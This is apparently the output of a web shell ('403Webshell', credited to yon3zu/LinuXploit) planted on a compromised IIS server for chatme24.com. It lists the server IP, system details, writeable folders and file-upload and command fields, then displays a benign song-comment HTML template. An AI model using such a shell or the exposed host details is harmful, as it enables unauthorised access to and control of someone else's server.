403Webshell
Server IP : 209.209.40.120  /  Your IP : 216.73.217.112
Web Server : Microsoft-IIS/10.0
System : Windows NT NEWWWW 10.0 build 17763 (Windows Server 2019) i586
User : NEWWWW$ ( 0)
PHP Version : 8.3.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/HostingSpaces/admin/chatme24.com/wwwroot/_frameworks/main/oryx/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/HostingSpaces/admin/chatme24.com/wwwroot/_frameworks/main/oryx//music_song_show.html
{header}


<script type="text/javascript">

function on_song_comment_post()
{
    comment_text = $('#song_comment_text').val();
    if(comment_text === "")
    {
        alert('{l_please_enter_text}');
        return;
    }

    $('#song_comment_post_button').attr('disabled', true);
    $('#song_comment_post_animation').css('visibility', 'visible');

    $.ajax({
          type: 'POST',
          url: '{url_main}music_song_comment_create_ajax.php',
          data: {
              song_id: {song_id},
              comment_text: comment_text 
              },
          success: function (data, textStatus, XMLHttpRequest)
              {
				redirectRequiresAuth(data);
                  $('#song_comment_post_animation').css('visibility', 'hidden');
                  $('#song_comment_text').val('');
                  $('#song_comment_post_button').attr('disabled', false);
                  song_comment_list_load_page(1);
              }
        });
}

</script>

    <div class="music_new">

		{music_header}

        <table class="tb_music_new">
            <tr>
                <!-- td_main -->
                <td class="td_main">

                    {music_song_show}

                    <div class="music_new_shadow"></div>

                    <div class="music_new_p pl_top_m">
                        <h1 class="txt_color">{l_other_tracks_by} {musician_name}</h1>

                        {music_song_list}
						
						
						

                        <div class="line_dashed"></div>

                        <h1 class="txt_color">{l_song_comments}</h1>

                        {music_song_comment_list}

                        <div class="cl"></div>

                        <!-- new_mods_comments -->
                        <div class="music_new_comments">
                            <div class="music_new_comments_head">
                                <div class="music_new_comments_txt">
                                    <strong>{l_leave_your_comment}:</strong>
                                </div>
                            </div>
                            <div class="music_new_comments_c violet">
                                <img style="float:left;" src="{user_photo}"  width="62" height="70" alt="" title="{user_name}"/>
                         
                                <div class="music_textarea2 fl_right">
								    <textarea class="no_abk" id="song_comment_text"></textarea>
                 
                                </div>
                        
                            <div class="justify"></div>
                            </div>
                            <div class="music_new_comments_bot violet_bot"></div>
                        </div>
                        <!-- /new_mods_comments -->
                        
                      <!-- <div class="music_input8 fl_right"><input id="song_comment_post_button" type="button" value="{l_comment}" onclick="on_song_comment_post();"/></div> -->
                      <div class="fl_right">
                      <input class="btn upper_header_color round big" id="song_comment_post_button" type="button" value="{l_comment}" onclick="on_song_comment_post();"/></div>
                            <img style="visibility:hidden; margin: 1px 10px 0 0;" class="fl_right" id="song_comment_post_animation" src="{url_tmpl_main}images/load_animation.gif">
                     

                    </div>

                    <div class="music_new_empty"></div>

                </td>
                <!-- /td_main -->

				{music_sidebar}
				
            </tr>
        </table>

        <div class="foot_left"></div>
		<div class="foot_right"></div>

    
    </div>


{footer}

Youez - 2016 - github.com/yon3zu
LinuXploit